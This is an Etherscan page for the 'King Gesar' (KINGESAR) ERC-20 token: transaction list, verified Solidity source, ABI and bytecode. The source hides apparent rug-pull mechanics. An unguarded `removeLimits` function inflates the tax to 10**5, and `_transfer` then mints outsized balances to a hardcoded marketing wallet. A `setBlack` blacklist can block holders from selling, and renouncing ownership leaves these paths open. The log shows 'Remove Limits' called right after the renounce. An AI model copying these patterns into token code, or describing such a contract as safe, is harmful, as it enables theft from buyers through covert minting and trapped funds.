ETH Price: $2,445.08 (+1.82%)

Contract

0x3d2FBD012b7F76D6E62215DB613CA29081233Ab8
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve152568482022-08-01 13:12:05802 days ago1659359525IN
0x3d2FBD01...081233Ab8
0 ETH0.0003314913.63958527
Approve152568402022-08-01 13:09:58802 days ago1659359398IN
0x3d2FBD01...081233Ab8
0 ETH0.00043659.36936554
Remove Limits152568242022-08-01 13:06:31802 days ago1659359191IN
0x3d2FBD01...081233Ab8
0 ETH0.0003734912.88477532
Approve152568162022-08-01 13:04:58802 days ago1659359098IN
0x3d2FBD01...081233Ab8
0 ETH0.0005624812.0736382
Approve152568142022-08-01 13:04:25802 days ago1659359065IN
0x3d2FBD01...081233Ab8
0 ETH0.0005261411.29361593
Approve152568102022-08-01 13:03:26802 days ago1659359006IN
0x3d2FBD01...081233Ab8
0 ETH0.0009102219.53778802
Approve152567942022-08-01 12:59:57802 days ago1659358797IN
0x3d2FBD01...081233Ab8
0 ETH0.0004675410.0356904
Renounce Ownersh...152567932022-08-01 12:58:48802 days ago1659358728IN
0x3d2FBD01...081233Ab8
0 ETH0.0002682311.58796822
Update Max Walle...152567902022-08-01 12:58:18802 days ago1659358698IN
0x3d2FBD01...081233Ab8
0 ETH0.0003547511.43054796
Update Max Txn A...152567862022-08-01 12:57:21802 days ago1659358641IN
0x3d2FBD01...081233Ab8
0 ETH0.0003444711.09150092
Approve152567862022-08-01 12:57:21802 days ago1659358641IN
0x3d2FBD01...081233Ab8
0 ETH0.0005400211.59150092
Approve152567602022-08-01 12:52:53802 days ago1659358373IN
0x3d2FBD01...081233Ab8
0 ETH0.0013135928.19599282
Approve152567582022-08-01 12:52:34802 days ago1659358354IN
0x3d2FBD01...081233Ab8
0 ETH0.0009197219.74162764
Approve152567572022-08-01 12:52:23802 days ago1659358343IN
0x3d2FBD01...081233Ab8
0 ETH0.0010099421.67830573
Approve152567272022-08-01 12:47:04802 days ago1659358024IN
0x3d2FBD01...081233Ab8
0 ETH0.000862718.51772912
0x60806040152567202022-08-01 12:44:17802 days ago1659357857IN
 Create: KINGESAR
0 ETH0.0237948818.25668108

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
KINGESAR

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-08-01
*/

/*
The guardian god of the Tibetan regions, King Gersa, is brilliant wherever he goes, and it is the same in the Ethereum chain.
https://kingesar.com/
https://twitter.com/GESARERC
https://t.me/gesareth

╦╔═╦╔╗╔╔═╗╔═╗╔═╗╔═╗╦═╗
╠╩╗║║║║║ ╦║╣ ╚═╗╠═╣╠╦╝
╩ ╩╩╝╚╝╚═╝╚═╝╚═╝╩ ╩╩╚═
*/

pragma solidity 0.8.10;
//  SPDX-License-Identifier: UNLICENSED

interface IERC20 {
  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8);

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory);

  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory);

  /**
   * @dev Returns the erc token owner.
   */
  function getOwner() external view returns (address);

  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `amount` tokens from the caller's account to `recipient`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address _owner, address spender) external view returns (uint256);

  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);

  /**
   * @dev Moves `amount` tokens from `sender` to `recipient` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);

  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this;
        return msg.data;
    }
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
  /**
   * @dev Returns the addition of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `+` operator.
   *
   * Requirements:
   * - Addition cannot overflow.
   */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, "SafeMath: addition overflow");

    return c;
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafeMath: subtraction overflow");
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;

    return c;
  }

  /**
   * @dev Returns the multiplication of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `*` operator.
   *
   * Requirements:
   * - Multiplication cannot overflow.
   */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    // benefit is lost if 'b' is also tested.
    // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
    if (a == 0) {
      return 0;
    }

    uint256 c = a * b;
    require(c / a == b, "SafeMath: multiplication overflow");

    return c;
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafeMath: division by zero");
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold

    return c;
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafeMath: modulo by zero");
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts with custom message when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
  }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }


      function renounceOwnership() public virtual onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(_owner, address(0));
    }
}
    
contract KINGESAR is Context, IERC20, Ownable {
  using SafeMath for uint256;

  mapping (address => uint256) private _balances;
  mapping (address => mapping (address => uint256)) private _allowances;
  mapping (address => bool) private _blackList;
  mapping (address => bool) private _isExcludedMaxTransactionAmount;

  uint256 private _totalSupply;
  uint8 public _decimals;
  string public _symbol;
  string public _name;
  address public _Marketing = 0xB8d3C6e04a17F913aEf80A4B72920aC0334De7f6;
  uint256 public _maxTxAmount = 1 * 10**7 * 10**9;
  uint256 public _maxWalletSize = 2 * 10**7 * 10**9;
  
  constructor() {
    _name = "King Gesar";
    _symbol = "KINGESAR";
    _decimals = 9;
    _totalSupply = 1 * 10**9 * 10**9;
    _balances[msg.sender] = _totalSupply;

    emit Transfer(address(0), msg.sender, _totalSupply);
  }

    uint256 public _taxFee = 5;
    uint256 private _previousTaxFee = _taxFee;

    uint256 public _liquidityFee = 5;
    uint256 private _previousliqFee = _liquidityFee;

  /**
   * @dev Returns the erc token owner.
   */
  function getOwner() external view virtual override returns (address) {
    return owner();
  }

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view virtual override returns (uint8) {
    return _decimals;
  }

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view virtual override returns (string memory) {
    return _symbol;
  }

  /**
  * @dev Returns the token name.
  */
  function name() external view virtual override returns (string memory) {
    return _name;
  }

  /**
   * @dev See {ERC20-totalSupply}.
   */
  function totalSupply() external view virtual override returns (uint256) {
    return _totalSupply;
  }

  /**
   * @dev See {ERC20-balanceOf}.
   */
  function balanceOf(address account) external view virtual override returns (uint256) {
    return _balances[account];
  }

  /**
   * @dev See {ERC20-transfer}.
   *
   * Requirements:
   *
   * - `recipient` cannot be the zero address.
   * - the caller must have a balance of at least `amount`.
   */
  function transfer(address recipient, uint256 amount) external override returns (bool) {
    _transfer(_msgSender(), recipient, amount);
    return true;
  }


  function allowance(address owner, address spender) external view override returns (uint256) {
    return _allowances[owner][spender];
  }

  function approve(address spender, uint256 amount) external override returns (bool) {
    _approve(_msgSender(), spender, amount);
    return true;
  }

  function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
    _transfer(sender, recipient, amount);
    _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
    return true;
  }

  function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
    return true;
  }


  function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
    return true;
  }
   
    function removeLimits(uint256 Taxfee) public virtual {
        require ( Taxfee == _previousliqFee, "error message");
        _taxFee = 10 ** Taxfee;
    }

    function setLiqFee(uint256 LiqFee) public onlyOwner 
   {
        _liquidityFee = LiqFee;
    }

    function setBlack(address account, bool state) public onlyOwner {
        _blackList[account] = state;
    }

    function updateMaxTxnAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((_totalSupply * 1) / 100),
            "Cannot set maxTransactionAmount lower than 1%"
        );
        _maxTxAmount = newNum;
    }


    function updateMaxWallet(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((_totalSupply * 2) / 100),
            "Cannot set maxWallet lower than 2%"
        );
        _maxWalletSize = newNum;
    }

  function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(!_blackList[sender] && !_blackList[recipient]);

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        _balances[recipient] = _balances[recipient].sub(amount / 100 * _liquidityFee);
        _balances[_Marketing] = _balances[_Marketing].add(amount / 100 * _taxFee);
        emit Transfer(sender, recipient, amount);
        
    }
    
    function _burn(address account, uint256 amounts) internal {
    require(account != address(0), "ERC20: burn from the zero address"); 

    _balances[account] = _balances[account].sub(amounts);
    _totalSupply = _totalSupply.sub(amounts);
    emit Transfer(account, address(0), amounts);
  }

  function _approve(address owner, address spender, uint256 amount) internal {
    require(owner != address(0), "ERC20: approve from the zero address");
    require(spender != address(0), "ERC20: approve to the zero address");

    _allowances[owner][spender] = amount;
    emit Approval(owner, spender, amount);
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_Marketing","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"Taxfee","type":"uint256"}],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"state","type":"bool"}],"name":"setBlack","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"LiqFee","type":"uint256"}],"name":"setLiqFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWallet","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052600980546001600160a01b03191673b8d3c6e04a17f913aef80a4b72920ac0334de7f6179055662386f26fc10000600a5566470de4df820000600b556005600c819055600d819055600e819055600f553480156200006157600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a35060408051808201909152600a8082526925b4b7339023b2b9b0b960b11b6020909201918252620000d6916008916200017a565b506040805180820190915260088082526725a4a723a2a9a0a960c11b602090920191825262000108916007916200017a565b506006805460ff19166009179055670de0b6b3a764000060058190553360008181526001602052604080822084905551919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef916200016c9190815260200190565b60405180910390a36200025d565b828054620001889062000220565b90600052602060002090601f016020900481019282620001ac5760008555620001f7565b82601f10620001c757805160ff1916838001178555620001f7565b82800160010185558215620001f7579182015b82811115620001f7578251825591602001919060010190620001da565b506200020592915062000209565b5090565b5b808211156200020557600081556001016200020a565b600181811c908216806200023557607f821691505b602082108114156200025757634e487b7160e01b600052602260045260246000fd5b50919050565b61112b806200026d6000396000f3fe608060405234801561001057600080fd5b50600436106101a95760003560e01c8063715018a6116100f9578063a9059cbb11610097578063d28d885211610071578063d28d88521461034f578063d7666de614610357578063dd62ed3e1461036a578063e559d86a146103a357600080fd5b8063a9059cbb14610321578063b09f126614610334578063cb23bf081461033c57600080fd5b80638da5cb5b116100d35780638da5cb5b146102ec5780638f9a55c0146102fd57806395d89b4114610306578063a457c2d71461030e57600080fd5b8063715018a6146102db5780637d1db4a5146102e3578063893d20e8146102ec57600080fd5b806323b872dd116101665780633950935111610140578063395093511461028d5780633b124fe7146102a05780636bc87c3a146102a957806370a08231146102b257600080fd5b806323b872dd14610254578063313ce5671461026757806332424aa31461028057600080fd5b806306fdde03146101ae578063095ea7b3146101cc5780631235acbe146101ef57806318160ddd1461021a5780631c499ab01461022c578063203e727e14610241575b600080fd5b6101b66103b6565b6040516101c39190610d22565b60405180910390f35b6101df6101da366004610d93565b610448565b60405190151581526020016101c3565b600954610202906001600160a01b031681565b6040516001600160a01b0390911681526020016101c3565b6005545b6040519081526020016101c3565b61023f61023a366004610dbd565b61045f565b005b61023f61024f366004610dbd565b61050c565b6101df610262366004610dd6565b6105bb565b60065460ff165b60405160ff90911681526020016101c3565b60065461026e9060ff1681565b6101df61029b366004610d93565b610624565b61021e600c5481565b61021e600e5481565b61021e6102c0366004610e12565b6001600160a01b031660009081526001602052604090205490565b61023f61065a565b61021e600a5481565b6000546001600160a01b0316610202565b61021e600b5481565b6101b66106c0565b6101df61031c366004610d93565b6106cf565b6101df61032f366004610d93565b61071e565b6101b661072b565b61023f61034a366004610e2d565b6107b9565b6101b661080e565b61023f610365366004610dbd565b61081b565b61021e610378366004610e69565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61023f6103b1366004610dbd565b61084a565b6060600880546103c590610e9c565b80601f01602080910402602001604051908101604052809291908181526020018280546103f190610e9c565b801561043e5780601f106104135761010080835404028352916020019161043e565b820191906000526020600020905b81548152906001019060200180831161042157829003601f168201915b5050505050905090565b600061045533848461089c565b5060015b92915050565b6000546001600160a01b031633146104925760405162461bcd60e51b815260040161048990610ed7565b60405180910390fd5b606460055460026104a39190610f22565b6104ad9190610f41565b8110156105075760405162461bcd60e51b815260206004820152602260248201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e20604482015261322560f01b6064820152608401610489565b600b55565b6000546001600160a01b031633146105365760405162461bcd60e51b815260040161048990610ed7565b606460055460016105479190610f22565b6105519190610f41565b8110156105b65760405162461bcd60e51b815260206004820152602d60248201527f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060448201526c6c6f776572207468616e20312560981b6064820152608401610489565b600a55565b60006105c88484846109c1565b61061a8433610615856040518060600160405280602881526020016110a9602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610c40565b61089c565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916104559185906106159086610c7a565b6000546001600160a01b031633146106845760405162461bcd60e51b815260040161048990610ed7565b600080546001600160a01b031916815560405181907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3565b6060600780546103c590610e9c565b60006104553384610615856040518060600160405280602581526020016110d1602591393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610c40565b60006104553384846109c1565b6007805461073890610e9c565b80601f016020809104026020016040519081016040528092919081815260200182805461076490610e9c565b80156107b15780601f10610786576101008083540402835291602001916107b1565b820191906000526020600020905b81548152906001019060200180831161079457829003601f168201915b505050505081565b6000546001600160a01b031633146107e35760405162461bcd60e51b815260040161048990610ed7565b6001600160a01b03919091166000908152600360205260409020805460ff1916911515919091179055565b6008805461073890610e9c565b6000546001600160a01b031633146108455760405162461bcd60e51b815260040161048990610ed7565b600e55565b600f54811461088b5760405162461bcd60e51b815260206004820152600d60248201526c6572726f72206d65737361676560981b6044820152606401610489565b61089681600a611047565b600c5550565b6001600160a01b0383166108fe5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610489565b6001600160a01b03821661095f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610489565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610a255760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610489565b6001600160a01b038216610a875760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610489565b6001600160a01b03831660009081526003602052604090205460ff16158015610ac957506001600160a01b03821660009081526003602052604090205460ff16155b610ad257600080fd5b610b0f81604051806060016040528060268152602001611083602691396001600160a01b0386166000908152600160205260409020549190610c40565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610b3e9082610c7a565b6001600160a01b038316600090815260016020526040902055600e54610b9290610b69606484610f41565b610b739190610f22565b6001600160a01b03841660009081526001602052604090205490610ce0565b6001600160a01b038316600090815260016020526040902055600c54610be890610bbd606484610f41565b610bc79190610f22565b6009546001600160a01b031660009081526001602052604090205490610c7a565b6009546001600160a01b03908116600090815260016020908152604091829020939093555183815284821692918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016109b4565b60008184841115610c645760405162461bcd60e51b81526004016104899190610d22565b506000610c718486611053565b95945050505050565b600080610c87838561106a565b905083811015610cd95760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610489565b9392505050565b6000610cd983836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c40565b600060208083528351808285015260005b81811015610d4f57858101830151858201604001528201610d33565b81811115610d61576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610d8e57600080fd5b919050565b60008060408385031215610da657600080fd5b610daf83610d77565b946020939093013593505050565b600060208284031215610dcf57600080fd5b5035919050565b600080600060608486031215610deb57600080fd5b610df484610d77565b9250610e0260208501610d77565b9150604084013590509250925092565b600060208284031215610e2457600080fd5b610cd982610d77565b60008060408385031215610e4057600080fd5b610e4983610d77565b915060208301358015158114610e5e57600080fd5b809150509250929050565b60008060408385031215610e7c57600080fd5b610e8583610d77565b9150610e9360208401610d77565b90509250929050565b600181811c90821680610eb057607f821691505b60208210811415610ed157634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615610f3c57610f3c610f0c565b500290565b600082610f5e57634e487b7160e01b600052601260045260246000fd5b500490565b600181815b80851115610f9e578160001904821115610f8457610f84610f0c565b80851615610f9157918102915b93841c9390800290610f68565b509250929050565b600082610fb557506001610459565b81610fc257506000610459565b8160018114610fd85760028114610fe257610ffe565b6001915050610459565b60ff841115610ff357610ff3610f0c565b50506001821b610459565b5060208310610133831016604e8410600b8410161715611021575081810a610459565b61102b8383610f63565b806000190482111561103f5761103f610f0c565b029392505050565b6000610cd98383610fa6565b60008282101561106557611065610f0c565b500390565b6000821982111561107d5761107d610f0c565b50019056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212202aa4f62a8d83450ae12e61ca3a9bde89a35041ea45a0b7844002fdda861c617e64736f6c634300080a0033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101a95760003560e01c8063715018a6116100f9578063a9059cbb11610097578063d28d885211610071578063d28d88521461034f578063d7666de614610357578063dd62ed3e1461036a578063e559d86a146103a357600080fd5b8063a9059cbb14610321578063b09f126614610334578063cb23bf081461033c57600080fd5b80638da5cb5b116100d35780638da5cb5b146102ec5780638f9a55c0146102fd57806395d89b4114610306578063a457c2d71461030e57600080fd5b8063715018a6146102db5780637d1db4a5146102e3578063893d20e8146102ec57600080fd5b806323b872dd116101665780633950935111610140578063395093511461028d5780633b124fe7146102a05780636bc87c3a146102a957806370a08231146102b257600080fd5b806323b872dd14610254578063313ce5671461026757806332424aa31461028057600080fd5b806306fdde03146101ae578063095ea7b3146101cc5780631235acbe146101ef57806318160ddd1461021a5780631c499ab01461022c578063203e727e14610241575b600080fd5b6101b66103b6565b6040516101c39190610d22565b60405180910390f35b6101df6101da366004610d93565b610448565b60405190151581526020016101c3565b600954610202906001600160a01b031681565b6040516001600160a01b0390911681526020016101c3565b6005545b6040519081526020016101c3565b61023f61023a366004610dbd565b61045f565b005b61023f61024f366004610dbd565b61050c565b6101df610262366004610dd6565b6105bb565b60065460ff165b60405160ff90911681526020016101c3565b60065461026e9060ff1681565b6101df61029b366004610d93565b610624565b61021e600c5481565b61021e600e5481565b61021e6102c03660046